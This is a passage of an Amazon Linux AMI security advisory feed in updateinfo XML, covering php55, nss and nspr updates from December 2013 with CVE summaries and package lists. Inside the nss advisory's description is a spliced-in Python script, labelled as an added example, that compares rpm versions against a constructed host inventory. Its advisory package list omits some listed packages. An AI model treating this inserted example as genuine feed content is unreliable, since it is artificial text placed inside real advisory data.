arch="x86_64"><filename>Packages/php54-process-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-imap" 
version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.23" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.23-1.49.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.23" release="1.49.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-common-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.23" release="1.49.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-pgsql-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.23" release="1.49.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-bcmath-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.23-1.49.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.23" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.23-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-264</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-264: critical priority package update for php55</title><issued date="2013-12-17 21:29:00" /><updated date="2014-09-16 22:11:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6420:
A memory corruption flaw was found in the way the openssl_x509_parse() function of the PHP openssl extension parsed X.509 certificates. A remote attacker could use this flaw to provide a malicious self-signed certificate or a certificate signed by a trusted authority to a PHP application using the aforementioned function, causing the application to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the user running the PHP interpreter.
1036830:
CVE-2013-6420 php: memory corruption in openssl_x509_parse()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6420" title="" id="CVE-2013-6420" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-cli" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.7" release="1.61.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-imap-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.7" 
release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.7" release="1.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.7-1.61.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.7-1.61.amzn1.i686.rpm</filename></package><package 
name="php55-cli" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-opcache" 
version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.7" 
release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.7-1.61.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.7" release="1.61.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.7-1.61.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-265</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-265: important priority package update for nss</title><issued date="2013-12-17 21:31:00" /><updated date="2014-09-16 22:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5607:
An integer overflow flaw was discovered in both NSS's and NSPR's implementation of certificate parsing on 64-bit systems (this identifier tracks the NSPR side of the flaw; CVE-2013-1741 tracks the NSS side). A remote attacker could use these flaws to cause an application using NSS or NSPR to crash.
CVE-2013-5606:
It was discovered that NSS did not reject certificates with incompatible key usage constraints when validating them while the verifyLog feature was enabled. An application using the NSS certificate validation API could accept an invalid certificate.
CVE-2013-5605:
A flaw was found in the way NSS handled invalid handshake packets. A remote attacker could use this flaw to cause a TLS/SSL client using NSS to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
CVE-2013-1741:
An integer overflow flaw was discovered in both NSS's and NSPR's implementation of certificate parsing on 64-bit systems (this identifier tracks the NSS side of the flaw; CVE-2013-5607 tracks the NSPR side). A remote attacker could use these flaws to cause an application using NSS or NSPR to crash.
CVE-2013-1739:
It was found that the fix for CVE-2013-1620 released via RHSA-2013:1135 introduced a regression causing NSS to read uninitialized data when a decryption failure occurred. A remote attacker could use this flaw to cause a TLS/SSL server using NSS to crash.
CVE-2013-1620:
It was discovered that NSS leaked timing information when decrypting TLS/SSL and DTLS records protected with CBC-mode cipher suites (the "Lucky Thirteen" attack). A remote attacker could possibly use this flaw to recover plaintext from encrypted records by using a TLS/SSL or DTLS server built on NSS as a padding oracle.
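Added example, not part of the ALAS feed or of Amazon's tooling: ALAS-2013-265 and ALAS-2013-266 carry the same description text, so the description alone cannot tell an operator which packages a host is missing; the package list above and an rpm-style epoch/version/release comparison can. The script below reimplements rpm's rpmvercmp() ordering in Python (so it runs without the rpm bindings) and checks a constructed host inventory against the x86_64 entries of ALAS-2013-265. The host inventory, the helper names and the treatment of an "(none)" epoch as 0 are assumptions made for the example; the advisory-side values are the ones listed in this update.

```python
"""
Added example: decide which packages listed in an ALAS advisory are still
missing on a host.  The advisory side is the (name, epoch, version, release,
arch) tuples carried in updateinfo.xml; the host side is whatever
rpm -qa --qf '%{NAME} %{EPOCH} %{VERSION} %{RELEASE} %{ARCH}\n' reports.
Version ordering follows rpm's rpmvercmp() rules, reimplemented here so the
script runs without the rpm Python bindings.
"""
import re

# rpmvercmp() looks at runs of digits, runs of letters and the tilde marker;
# every other character is a separator and carries no meaning.
_TOKEN = re.compile(r"[0-9]+|[A-Za-z]+|~")


def rpmvercmp(a, b):
    """Return 1 if a is newer than b, -1 if older, 0 if equal (rpm rules)."""
    if a == b:
        return 0
    ta, tb = _TOKEN.findall(a), _TOKEN.findall(b)
    while ta or tb:
        # A tilde sorts before anything, including the end of the string,
        # which is what makes 1.0~rc1 older than 1.0.
        if (ta and ta[0] == "~") or (tb and tb[0] == "~"):
            if not ta or ta[0] != "~":
                return 1
            if not tb or tb[0] != "~":
                return -1
            ta.pop(0)
            tb.pop(0)
            continue
        # Whichever side still has segments left is the newer one.
        if not ta:
            return -1
        if not tb:
            return 1
        x, y = ta.pop(0), tb.pop(0)
        if x.isdigit() != y.isdigit():
            # A numeric segment is newer than an alphabetic one.
            return 1 if x.isdigit() else -1
        if x.isdigit():
            # Compare numerically: drop leading zeros, then the longer run wins.
            x, y = x.lstrip("0"), y.lstrip("0")
            if len(x) != len(y):
                return 1 if len(x) > len(y) else -1
        if x != y:
            return 1 if x > y else -1
    return 0


def _epoch(e):
    # rpm prints "(none)" for an unset epoch; an unset epoch compares as 0.
    return 0 if e in (None, "", "(none)") else int(e)


def evrcmp(e1, v1, r1, e2, v2, r2):
    """Compare two (epoch, version, release) triples; epoch dominates."""
    if _epoch(e1) != _epoch(e2):
        return 1 if _epoch(e1) > _epoch(e2) else -1
    c = rpmvercmp(v1, v2)
    if c != 0:
        return c
    return rpmvercmp(r1, r2)


def applicable_updates(advisory_pkgs, installed):
    """Return the advisory packages strictly newer than the installed package
    of the same name and arch.  Packages the host does not have at all are
    ignored: an advisory entry for nss-devel is irrelevant on a box without it."""
    have = {(p["name"], p["arch"]): p for p in installed}
    missing = []
    for p in advisory_pkgs:
        cur = have.get((p["name"], p["arch"]))
        if cur is None:
            continue
        if evrcmp(p["epoch"], p["version"], p["release"],
                  cur["epoch"], cur["version"], cur["release"]) > 0:
            missing.append(p)
    return missing


def _pkg(name, epoch, version, release, arch="x86_64"):
    return {"name": name, "epoch": epoch, "version": version,
            "release": release, "arch": arch}


# x86_64 entries of ALAS-2013-265, values as listed in the advisory.
ALAS_2013_265 = [
    _pkg("nss", "0", "3.15.3", "2.31.amzn1"),
    _pkg("nss-tools", "0", "3.15.3", "2.31.amzn1"),
    _pkg("nss-sysinit", "0", "3.15.3", "2.31.amzn1"),
    _pkg("nss-devel", "0", "3.15.3", "2.31.amzn1"),
]

# Constructed host inventory (assumption): nss and nss-tools lag behind,
# nss-sysinit was already rebuilt, nss-devel is absent, nspr is not in
# this advisory at all.
HOST = [
    _pkg("nss", "0", "3.15.1", "15.27.amzn1"),
    _pkg("nss-tools", "0", "3.15.1", "15.27.amzn1"),
    _pkg("nss-sysinit", "0", "3.15.3", "2.31.amzn1"),
    _pkg("nspr", "0", "4.10.2", "1.19.amzn1"),
]


def check_host():
    """Names of the ALAS-2013-265 packages this host still needs."""
    return sorted(p["name"] for p in applicable_updates(ALAS_2013_265, HOST))


if __name__ == "__main__":
    for name in check_host():
        print("still vulnerable:", name)
```

On the instance itself, yum already does this comparison: yum updateinfo info ALAS-2013-265 prints the advisory and yum update --security applies every advisory of type security. The script is for the off-box case, for example checking an inventory pulled from many instances against the feed, where release strings such as 2.31.amzn1 versus 15.27.amzn1 must not be compared as plain text.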
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1620" title="" id="CVE-2013-1620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1739" title="" id="CVE-2013-1739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1741" title="" id="CVE-2013-1741" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5605" title="" id="CVE-2013-5605" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5606" title="" id="CVE-2013-5606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5607" title="" id="CVE-2013-5607" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1829.html" title="" id="RHSA-2013:1829" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-debuginfo" version="3.15.3" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.15.3-2.31.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.15.3" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.15.3-2.31.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.15.3" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.15.3-2.31.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.15.3" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.15.3-2.31.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.15.3" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.15.3-2.31.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.15.3" release="2.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.15.3-2.31.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.15.3" 
release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.15.3-2.31.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.15.3" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.15.3-2.31.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.15.3" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.15.3-2.31.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.15.3" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.15.3-2.31.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.15.3" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.15.3-2.31.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.15.3" release="2.31.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.15.3-2.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-266</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-266: important priority package update for nspr</title><issued date="2013-12-17 21:31:00" /><updated date="2014-09-16 22:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5607:
An integer overflow flaw was discovered in both NSS's and NSPR's implementation of certificate parsing on 64-bit systems (this identifier tracks the NSPR side of the flaw; CVE-2013-1741 tracks the NSS side). A remote attacker could use these flaws to cause an application using NSS or NSPR to crash.
CVE-2013-5606:
It was discovered that NSS did not reject certificates with incompatible key usage constraints when validating them while the verifyLog feature was enabled. An application using the NSS certificate validation API could accept an invalid certificate.
CVE-2013-5605:
A flaw was found in the way NSS handled invalid handshake packets. A remote attacker could use this flaw to cause a TLS/SSL client using NSS to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
CVE-2013-1741:
An integer overflow flaw was discovered in both NSS's and NSPR's implementation of certificate parsing on 64-bit systems (this identifier tracks the NSS side of the flaw; CVE-2013-5607 tracks the NSPR side). A remote attacker could use these flaws to cause an application using NSS or NSPR to crash.
CVE-2013-1739:
It was found that the fix for CVE-2013-1620 released via RHSA-2013:1135 introduced a regression causing NSS to read uninitialized data when a decryption failure occurred. A remote attacker could use this flaw to cause a TLS/SSL server using NSS to crash.
CVE-2013-1620:
It was discovered that NSS leaked timing information when decrypting TLS/SSL and DTLS records protected with CBC-mode cipher suites (the "Lucky Thirteen" attack). A remote attacker could possibly use this flaw to recover plaintext from encrypted records by using a TLS/SSL or DTLS server built on NSS as a padding oracle.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1620" title="" id="CVE-2013-1620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1739" title="" id="CVE-2013-1739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1741" title="" id="CVE-2013-1741" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5605" title="" id="CVE-2013-5605" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5606" title="" id="CVE-2013-5606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5607" title="" id="CVE-2013-5607" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1829.html" title="" id="RHSA-2013:1829" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr-debuginfo" version="4.10.2" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.10.2-1.19.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.10.2" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.10.2-1.19.amzn1.x86_64.rpm</filename></package><package name="nspr" version="4.10.2" release="1.19.amzn1" 